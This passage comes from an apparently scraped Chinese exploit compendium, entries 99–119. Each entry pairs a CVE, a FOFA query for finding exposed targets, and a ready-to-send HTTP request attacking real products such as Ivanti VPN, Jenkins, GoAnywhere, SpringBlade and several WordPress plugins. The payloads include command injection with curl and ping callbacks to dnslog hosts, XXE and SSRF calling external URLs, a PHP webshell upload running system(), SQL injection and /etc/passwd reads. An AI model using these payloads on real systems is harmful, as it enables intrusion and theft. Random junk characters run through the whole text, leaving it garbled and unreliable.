% @" m3 y' w$ `2 E" TX-Requested-With: XMLHttpRequest: B* O9 z3 k: |8 ~& C' x8 h/ O3 o
9 r% b$ N# l0 _3 Aid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
" {4 C% `; [7 V$ L2 H; j
- m+ p# I7 |0 s9 I- d
$ @ T5 [1 t2 [; f- \! g99. Ncast盈可视高清智能录播系统busiFacade RCE6 J7 D; I& u8 |8 `3 }- D
CVE-2024-03058 b+ |3 @- L! U5 r5 N3 z# k0 {
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
# U: S. Y! o+ B" z9 i9 n8 r* NPOST /classes/common/busiFacade.php HTTP/1.1: E( I7 o: o' R( N( }
Host: 192.168.40.130:8080, e5 J5 C, m4 @' k1 b! R! m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0* y" |) b5 d6 A8 y: f
Connection: close( N u Z$ y. w1 |; n. d. E
Content-Length: 154
" b* O) a: j. VAccept: */*; J) u9 D* S/ s
Accept-Encoding: gzip, deflate
2 H- i% G% C3 K5 s; N8 HAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 O6 V: t, x0 @2 K& O5 |( \& Q3 ]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
% X/ X. k5 D- S$ K, dX-Requested-With: XMLHttpRequest/ v S& F5 e* V) T/ J" U
8 Z; c4 \: s7 i/ e%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D5 S1 }3 `! K5 M
! {5 C/ ~" g( H' Z' s5 s
. z& C2 z; H; F& s. X100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传. L; q: r; z& Q
CVE-2024-03526 |- c% y- S! T
FOFA:icon_hash="874152924"- K6 z1 {9 [3 C; y) [3 c( W
POST /api/file/formimage HTTP/1.1
$ O1 o( v/ x9 K" l1 g% }" g3 _! yHost: 192.168.40.130/ y; P [& ], G( O q! p5 y+ w
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
; i' Y# B4 T0 I4 @Connection: close
- M* {8 Y& p4 o/ a6 WContent-Length: 201
$ i' ?! T6 x* q: [# kContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
# O8 k7 s% ?* qAccept-Encoding: gzip. Q9 L% I& d" G+ A7 y
8 }! V& S0 T$ Y" g% C
------WebKitFormBoundarygcflwtei
( o/ |6 `; ^1 R- ~4 Y# GContent-Disposition: form-data; name="file";filename="IE4MGP.php"6 |1 c( U d; Q! g+ @; f
Content-Type: application/x-php2 K7 u9 L9 }* f6 `7 H2 O
! h" {) [3 J' N3 T& n1 D/ o2ayyhRXiAsKXL8olvF5s4qqyI2O
+ i7 C4 h1 g5 E. r+ E------WebKitFormBoundarygcflwtei--
4 z0 g/ ~9 ]& [! P
4 O" e/ U4 T# C: f0 y& L
1 Z' S( A6 Z8 ?* I6 r101. ivanti policy secure-22.6命令注入
% t# t8 ?0 s+ u: X2 RCVE-2024-21887 V$ ?$ A9 |% [ n
FOFA:body="welcome.cgi?p=logo"9 V4 ?; D5 x. E0 B7 i$ F
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
1 n: ~; d' d" L) N5 v9 k: RHost: x.x.x.xx.x.x.x4 [- p4 A* ^5 j7 U$ t, x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36, k. X& b4 E. p5 }
Connection: close' {8 Z ^% f0 X' ~; _4 W
Accept-Encoding: gzip
- N, y% J: k. a) E& N5 ?6 J4 b, T. f2 [# @) b o! H
/ y6 ~9 `. Q& K2 K102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
; |6 m& W& |) `% ~4 |" w8 f KCVE-2024-21893; i1 ]; H) D0 s9 w( s
FOFA:body="welcome.cgi?p=logo"
8 B. s! K* q) b6 uPOST /dana-ws/saml20.ws HTTP/1.1
0 A! o& |( `" {Host: x.x.x.x
]) x- `/ f+ K' K- b/ VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36$ r6 n W( K z. v8 P- h
Connection: close
/ C9 x+ Q/ `1 K) b2 dContent-Length: 792
; o: @, T& W: GAccept-Encoding: gzip
7 e% t0 b' E! h3 G# `" z
' O" T: u$ v; a7 b* H$ M9 X<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>$ w! N" [) ^" u$ {7 R; D
% t- ]* }0 b( v* @103. Ivanti Pulse Connect Secure VPN XXE4 r; O# i- @6 A, H& g
CVE-2024-22024
( M+ F- C! l2 Q2 L5 c% x+ A8 q8 f. YFOFA:body="welcome.cgi?p=logo"3 R$ L1 O$ w/ f6 j, t
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
& \& V: v$ I4 m* N- J4 ^, vHost: 192.168.40.130:1118 W" |$ G8 R S8 k/ q/ y
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.365 b O" R+ m9 P& ~# N
Connection: close
# O2 A, o2 I, E4 d( y! YContent-Length: 204
) Y' M3 U- J' @' k4 Y9 A6 ~Content-Type: application/x-www-form-urlencoded
" }' X( O" W2 ]' a1 O6 W5 OAccept-Encoding: gzip
+ H* e0 B/ G7 m, g* ^! e( Y' w' q& ]
+ z* K6 n3 M7 T5 RSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==: F$ f# B2 _7 f, m
7 D! U! Y4 I7 _, a
' v: w {9 ?& P" A" F# F6 N! o其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
# G- z7 }1 H; l8 f/ N<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>. I1 a; r; V! k$ b) [# N' u0 j9 l
U( i! e# |! L, F
4 i' D3 f7 [1 O D- z! {) K
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露6 H& G1 H N. m( S1 F8 _
CVE-2024-0569
4 T8 c' A' o: m7 A3 M0 D dFOFA:title="TOTOLINK"
2 v2 v6 m& K$ z: J* y) kPOST /cgi-bin/cstecgi.cgi HTTP/1.1
; i! s' X; m/ T% cHost:192.168.0.1
; |+ \/ m: U: j. [. U8 IContent-Length:41
' w6 V9 m# O' [Accept:application/json,text/javascript,*/*;q=0.01
: D0 E* \5 C' |9 d) q2 K2 ~X-Requested-with: XMLHttpRequest
3 R- Y. B0 b2 `% t4 a# ]5 V1 @User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
8 m d, G5 {) U6 l% [Content-Type: application/x-www-form-urlencoded:charset=UTF-8' D7 ]' a( e( U; \# i: E
Origin: http://192.168.0.1
. k4 j# n& L8 l# RReferer: http://192.168.0.1/advance/index.html?time=1671152380564
* [, K. g6 z" G' I' X1 LAccept-Encoding:gzip,deflate3 F% m4 m7 s- i2 [9 K5 ^, y, a
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
- N* s! q2 v* ?. S; V; U7 A6 FConnection:close
/ V+ t( }) ^( X- \
$ w- o, ^- V* ]( @2 V0 K% D{
( C% u5 K# N1 o. |5 D"topicurl":"getSysStatusCfg"," W, n' g- v, m& `
"token":""' U: `2 j+ s, G0 U" O$ h; S( @
}
2 r4 z; b; A) _* y
! O4 O d+ y; i. N2 }105. SpringBlade v3.2.0 export-user SQL 注入
# z* ^! n4 h+ f0 n X$ QFOFA:body="https://bladex.vip"
6 `+ y9 k9 g$ j9 N4 s7 d4 dhttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=12 {) b# o$ F* Z5 M( [
, G: Y% g2 o% B
106. SpringBlade dict-biz/list SQL 注入
! L4 h/ u$ x/ Q0 TFOFA:body="Saber 将不能正常工作"
/ O1 L+ B1 h tGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1+ D0 @8 F) P7 _; j
Host: your-ip
! s6 u# l8 z* I" V" U( L& i a( E+ `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
b1 K& B* @$ y$ s( FBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A u! ~ J: ^- B0 F; k
Accept-Encoding: gzip, deflate
, S( Y1 g* t) ?5 J% iAccept-Language: zh-CN,zh;q=0.9
: q6 i/ o4 P6 g3 G: S) J# iConnection: close, ?9 u* \4 [6 x# u! t
2 L' ]) ?: [8 H& D: w8 v
% N3 c! U H" ?% g4 f( U" c107. SpringBlade tenant/list SQL 注入. h/ U0 J. X9 A4 ]
FOFA:body="https://bladex.vip"
5 O# ^4 b! k: HGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
6 q6 o" k; q C7 a5 ]8 E' v4 JHost: your-ip
& T# H% k1 i3 R1 q% gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ p* p6 K- X: ?1 U: |6 OBlade-Auth:替换为自己的: C2 b# A8 b3 ^, E" G
Connection: close+ a6 S! {( V* Z, b+ [$ E9 O
% B; U, ~; `# B) \; \- S# `6 L
1 [7 T b( H" X3 D# n; `" d108. D-Tale 3.9.0 SSRF1 u& e# K( N6 H. d+ U4 I+ j
CVE-2024-21642& u4 J6 v; [ |; ]2 C; M
FOFA:"dtale/static/images/favicon.png"
# x7 G( L, a5 `5 hGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.10 V) O* z9 Z5 W c
Host: your-ip
8 j6 d7 y. K7 ?Accept: application/json, text/plain, */*
9 ~, M5 n% }# Y7 m; M u6 { ^User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
8 ^$ Z9 M+ N( m8 t( E2 AAccept-Encoding: gzip, deflate! R* ~# K: B4 M4 W4 G0 l: r$ W+ n
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8& C+ g6 Q. t9 D8 V9 Q: D7 i: v, u
Connection: close! E% `1 @, Z2 U1 ]7 t- I
) U$ W: V, I5 e6 U9 y
F. Z; ^! c$ K( K4 R109. Jenkins CLI 任意文件读取9 E7 K1 ]. O8 E* w
CVE-2024-23897
% P+ o8 U! m! Q0 _& ]! ^* ^FOFA:header="X-Jenkins"0 M" v; X0 O- X+ Y8 w7 \
POST /cli?remoting=false HTTP/1.1
( S2 Y1 u O; X7 x3 U fHost:
: L* I: V2 O2 R2 \6 gContent-type: application/octet-stream/ L, E+ q+ Q4 M/ L8 k
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e929 x( m" P+ I! e/ _* g- Z
Side: upload$ e9 T4 `" H3 {0 N' y6 X8 v0 Z- M
Connection: keep-alive
$ O3 O; M1 H! _Content-Length: 163
" N q3 v( s0 e( \! k. L3 E/ j" k
) P+ A" _! T- f; c& G5 Mb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
* O# ~, S2 t ?* F- m# B
3 Z( J" Y) K# T, p- B
& |3 g7 u# Z- SPOST /cli?remoting=false HTTP/1.1. [) c' w$ N" O- m2 T
Host:
3 `9 }$ q. w1 {' e% P6 b6 j' hSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92$ M1 c \- X' p W
download2 \8 ~0 ^8 }6 i0 Z( d, {# @( K4 Z9 y
Content-Type: application/x-www-form-urlencoded) T# h8 J) P( ?5 N- Y5 c% `4 _4 c
Content-Length: 0: k$ O$ R- Y4 ] \: J
" {( o3 Y( y) R5 c& M
$ x: I8 ^8 j7 d$ X% w% o; X4 s
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin8 B" ~4 R( C% i0 |
java -jar jenkins-cli.jar help% [0 L( y. b& o! |! S
[COMMAND] E( F6 N8 C8 Y4 v, n# ?' {
Lists all the available commands or a detailed description of single command.
3 B. Q5 m2 D7 k3 H: c COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)* c1 b1 J6 {' N( G
- u( A. z7 \. h% [; w! `+ M0 i7 p
+ P9 V0 M3 m- B* _110. Goanywhere MFT 未授权创建管理员( g! l, C; c5 J; H& @* X
CVE-2024-0204; k: j: g9 \+ F9 T
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
' M9 v1 n! N1 [) L$ W! TGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1$ l& e+ B' V' W1 N1 K5 R: S' B# R
Host: 192.168.40.130:8000$ ~ U9 x) B( n8 e, f. S
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.363 d2 c* X, r8 X
Connection: close
, c6 q) c* h) H( y# \Accept: */*
$ z7 Q X+ t6 A7 p3 a. NAccept-Language: en( N- @5 v+ m! D
Accept-Encoding: gzip
5 W8 I5 ?! ^% I; i, e y+ g$ O, @1 Q$ @+ U" n j, a
/ c4 q7 B7 Y6 e; v* |) m
111. WordPress Plugin HTML5 Video Player SQL注入
0 T( y0 T# T" nCVE-2024-1061
- M& A, ^: d9 D [2 DFOFA:"wordpress" && body="html5-video-player"
8 D& {, Z. z/ ], Z- j. K# m" }GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.13 D9 U8 i9 `6 S* D- p
Host: 192.168.40.130:112
3 }6 |5 }: {$ oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' r5 t5 r4 b% b; r4 \
Connection: close; B0 a0 L/ T: i0 w. {: G, A% C
Accept: */*
: j j( _; M: r2 e. TAccept-Language: en3 ~$ k8 ^2 U% o% ~/ Y
Accept-Encoding: gzip* i1 _4 S& S) w2 A
, e6 q3 d! U3 Z- i/ [- o, x7 H
7 H% c5 |0 i' |' ?3 B/ i9 Y
112. WordPress Plugin NotificationX SQL 注入7 h2 h7 J' T: J: P1 [9 Q) l
CVE-2024-1698! ]2 Y3 a+ ?) j8 L$ |$ B4 x& [
FOFA:body="/wp-content/plugins/notificationx"; D4 w9 X% V9 V1 r3 M. @
POST /wp-json/notificationx/v1/analytics HTTP/1.1' Z, @: S" W+ @- e
Host: {{Hostname}}! k7 J# D8 h! Z" t# {3 Q6 N
Content-Type: application/json
& C! j& G6 ?% D2 g" D7 f, E' O0 W. d' A
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}7 [4 W+ p5 {) j9 b$ A C( Y3 S
* |: B- b, z0 B2 J/ f
0 {, R2 d8 _7 r( {2 x3 I; P4 a; i3 |+ |113. WordPress Automatic 插件任意文件下载和SSRF
/ E+ X6 }1 b8 ~CVE-2024-27954
% \# Y W2 K% V+ f( iFOFA:"/wp-content/plugins/wp-automatic"5 X9 `5 _$ \" b8 S7 R
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1# i7 c9 r4 G! Q1 T; D0 k" R
Host: x.x.x.x) {8 f% T1 h# u* [$ x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
5 x! l3 ^: S, I5 i2 O ZConnection: close a4 l6 n( a' P$ ]2 x! C+ w
Accept: */*. X$ p! P$ D7 d! z1 j' [* n
Accept-Language: en9 ~- a5 g# l8 N& ]! y5 K3 c
Accept-Encoding: gzip; w% ]) b$ F0 M& O, f2 X3 b1 D3 \
6 G; f& a3 r. L- M' d8 Q4 y3 L3 h
* r: _" ~6 V0 c( y- D114. WordPress MasterStudy LMS插件 SQL注入& I3 Y$ g/ c: _" i6 a$ O! r7 u
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"$ o, `( B% l8 R' x2 O) V) c! A$ L
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.16 ^) w$ w0 ?3 K: A- n& {
Host: your-ip$ t: a3 X9 ^) X" R' M7 M3 O! e
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36" D( }' ?" O2 `% l& k/ |: O
Accept-Charset: utf-8+ P; h* I# G# u% u7 C4 C4 v
Accept-Encoding: gzip, deflate
% v. U* [5 _1 g4 B9 m9 f; uConnection: close
6 m- V$ U6 x; ~/ w+ k. |9 _/ b! x; {9 W9 a: F' w+ o
. u: ^, I$ k8 P115. WordPress Bricks Builder <= 1.9.6 RCE* u) N- _" ?1 k% p2 n5 k8 T
CVE-2024-25600, n' U0 M3 i9 W& p! {/ J2 \
FOFA: body="/wp-content/themes/bricks/"
% K; m) M7 R( f" H9 l第一步,获取网站的nonce值" x4 v9 k: a5 U3 b5 b& U
GET / HTTP/1.1& N- o- c S& V. b$ _, U
Host: x.x.x.x1 m& w: U3 a- l" H# k( q
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36: b7 }4 K1 G" E4 W6 G/ H
Connection: close! \/ s9 [; S7 V# w9 w
Accept-Encoding: gzip
* B3 U) u5 h. s r2 b, n0 T( V+ A8 }! ]0 [* B) [& q
5 W w! `; @" t3 ~: B( G9 I$ X
第二步替换nonce值,执行命令2 O- {2 z0 z) Q; |4 L
POST /wp-json/bricks/v1/render_element HTTP/1.1
8 k5 J8 @7 f2 q. AHost: x.x.x.x
; T: Y5 ?9 ?; w$ G4 k2 @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.366 c. @7 z0 P* H8 t( G, I
Connection: close3 n4 \7 W: Y% n/ R, x; J
Content-Length: 356
3 T8 Z# x3 K6 ~3 U1 c! SContent-Type: application/json
# r1 j' r* n* OAccept-Encoding: gzip- Q4 {; }8 ^! t7 o/ N
" W; [ W9 i% A{) i8 t2 j. Q, X5 Q, h+ l+ s
"postId": "1",# I9 ^: s& R9 \! @
"nonce": "第一步获得的值",
# W& L% R \$ M "element": {' `! i* c+ U# |* S
"name": "container",; b& O0 n |! b
"settings": {
- P3 [& c r7 \ "hasLoop": "true",
0 L, w z6 C9 y. O# C "query": {
3 L9 i. M- \$ j; ?5 F "useQueryEditor": true,! i5 X V; h% b- h3 k
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",9 J& \& G. u3 {" s
"objectType": "post": w# N2 h% P5 v/ X
}! ^6 [( E! h; e5 q9 g+ U5 B: i. u) d
}4 d9 K9 _+ \7 ?
}6 m1 L) i \( |$ V: F8 T) Y
}+ m4 A8 Z+ R: V6 Z5 O' _( D
& w# J4 o' H# k; C) N; y
) d' _4 O6 h* A" E9 ^0 C116. wordpress js-support-ticket文件上传
( R" j P3 }4 Z6 bFOFA:body="wp-content/plugins/js-support-ticket"
' @4 y) `6 n/ C0 e9 i2 hPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
$ g9 p& I0 P- THost:
7 ~+ v" Z7 {( N" C$ k2 U, E$ D& ?Content-Type: multipart/form-data; boundary=--------767099171" x; |2 q' C) ^! q9 b
User-Agent: Mozilla/5.0
7 H/ x* N7 s. ~' r4 V: h- X. {* @. [0 s& q
----------767099171
S& T z( e1 s0 A9 r) TContent-Disposition: form-data; name="action"; {- ?( A9 w1 ^" x+ L5 \% }9 G
configuration_saveconfiguration& x- w& Y; q( }3 u
----------767099171
8 E% K* U) v& [9 K* eContent-Disposition: form-data; name="form_request"6 f! w) N* U! ?9 |0 a' c' X
jssupportticket0 ]. a. }4 Q9 `: b- c+ U
----------767099171
( \1 T. \, r) q: s# s, O6 ZContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
( u$ ]1 z; `! Z: V* vContent-Type: image/png
2 d/ O6 J% c: ?; `* f----------767099171--
( ]' X( p2 r1 ?8 G# H$ G# j" @( d( t1 E8 \: I0 }
' Z9 \3 A7 n2 e0 n8 S, I% g
117. WordPress LayerSlider插件SQL注入( D" y% q: R% k) j2 t, ~( I' o. z
version:7.9.11 – 7.10.0
6 t- Q3 i" g8 WFOFA:body="/wp-content/plugins/LayerSlider/", D( [+ r# g5 r7 v
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1% A! J+ n. G y, h3 K, G: V* @
Host: your-ip9 _' @4 |) E6 @" o: `* `; f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 K3 g: D9 n6 O- I5 P3 Y0 F' [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 z+ n3 }% g8 }, ^; N8 Y- s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 _+ Z" a' c. H/ }) d
Accept-Encoding: gzip, deflate, br
5 O C+ f7 B8 r5 Y2 uConnection: close5 |3 Q3 H. O& _1 l' z' T; {2 Y
Upgrade-Insecure-Requests: 1/ L( r2 n7 }0 K4 {7 G3 {
' P% {; }* Z& m5 l) _- j. {: N
% v, C7 o, Z! u8 K$ Y) W2 w( h: J/ |118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
0 U5 b" m* o. z- ECVE-2024-0939$ B* D) n; F0 s6 C I# W9 T
FOFA:title="Smart管理平台"4 j# D/ ?( ^' w" o& b) Z
POST /Tool/uploadfile.php? HTTP/1.1( W' f* `7 l* u" B0 d
Host: 192.168.40.130:8443( [: x$ m8 `! Z1 s) B
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
# `: Z, g; _- e( v2 f' Y/ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.06 l1 h0 M5 G' `7 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ K/ ?( [ [: N4 M# |- T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. V" g1 Z+ B8 m+ l4 C, i) G7 xAccept-Encoding: gzip, deflate
5 w7 I+ H* Q& h3 x% _& ~5 h1 QContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
1 J, i: ?& V0 r! D3 SContent-Length: 405
$ `0 B( n P( m+ M4 GOrigin: https://192.168.40.130:8443$ Z. T% S% |0 \
Referer: https://192.168.40.130:8443/Tool/uploadfile.php5 D+ f5 A m2 L: l4 ]: c
Upgrade-Insecure-Requests: 1
9 z# Q3 x3 u4 Y4 A. HSec-Fetch-Dest: document1 D. k5 T' v' d& Z7 V7 V- N
Sec-Fetch-Mode: navigate
* W, R' s2 \% G$ VSec-Fetch-Site: same-origin
- u! j) {. N" g+ c0 x3 N2 J( ?Sec-Fetch-User: ?1
8 T. T9 o. S! D8 s) a) r. w# v+ aTe: trailers
9 C* ?: k, K9 F* ^' N7 ?# j2 XConnection: close* t0 |( Z* M, K! }( `
, R) X. e% y" t; k, j% i1 p9 ~
-----------------------------13979701222747646634037182887
' R5 ?. f0 E; x3 tContent-Disposition: form-data; name="file_upload"; filename="contents.php"
! Q; v+ l9 U+ W1 x6 y3 O g8 cContent-Type: application/octet-stream6 x& r7 F6 g" F7 e
5 u" r- b* w& X% K- H/ ?; o, \4 s2 J<?php- A: F* j3 V5 s
system($_POST["passwd"]);* D; K3 i( h3 ?/ L2 x( `3 x, v* k
?>
& _. Q+ ?4 i& L. \-----------------------------13979701222747646634037182887" g t; J) u/ B( M
Content-Disposition: form-data; name="txt_path"
4 t! T0 {! q" Q$ \
4 G9 X& C! @" ?& x0 Y/home/src.php
. u- k, A$ h) h4 E6 H-----------------------------13979701222747646634037182887--. s6 r2 r2 m: O1 L
% Z5 J( y- t P! D
! ~6 Q1 B( F* ~" z访问/home/src.php& A$ S& a. E. i5 H# a
" h# D5 y E$ a9 S4 ^+ ?! q
119. 北京百绰智能S20后台sysmanageajax.php sql注入6 h/ W; F7 m G. b
CVE-2024-1254
. s" z2 J* Z9 ~( }& u% wFOFA:title="Smart管理平台"
5 r; ^( C8 z* f9 o: B I. t先登录进入系统,默认账号密码为admin/admin8 I$ J, c$ ~; w( q9 m" J
POST /sysmanage/sysmanageajax.php HTTP/1.11# [: e' u- }- S& r* a
Host: x.x.x.x
# {/ ?7 [* t" r2 RCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee: S0 P( f. ?- F% u1 V- g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
6 J+ U" q( N; k- _) kAccept: */*7 ]" a4 w3 o9 Q. ?: G& i0 e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 C0 i, U5 K3 D" A* a# T' Q
Accept-Encoding: gzip, deflate
2 i3 p( L( B, K# [0 @& Q! s( `, BContent-Type: application/x-www-form-urlencoded;; ?; r9 c4 \" ^$ d
Content-Length: 109, x/ D0 F- H8 ? T' K
Origin: https://58.18.133.60:8443
& W% [- @4 W( uReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
: c" K$ a" ^7 n8 o- tSec-Fetch-Dest: empty0 q0 J" S, \4 V5 [& N
Sec-Fetch-Mode: cors/ Z$ C7 T4 _' _/ l3 `6 P* [
Sec-Fetch-Site: same-origin
: e, Y: |8 A7 XX-Forwarded-For: 1.1.1.1
) j7 l1 ^5 _; \1 I5 Z( M5 cX-Originating-Ip: 1.1.1.1
; l# W6 E' e/ f4 m6 Y+ zX-Remote-Ip: 1.1.1.16 r! v0 U! o; g; k1 f4 N1 W
X-Remote-Addr: 1.1.1.10 Q, e; u, }' M8 {" P
Te: trailers% i5 z w. {5 n% y
Connection: close) l* F% w# S- G3 u( s8 R
6 [' G0 U ^* h- z% ^2 ]& gsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
. _: [2 [, s$ h& f+ B+ ?" ?4 N! w, P7 _
/ c& e0 f! O4 w* ]3 c% f8 x
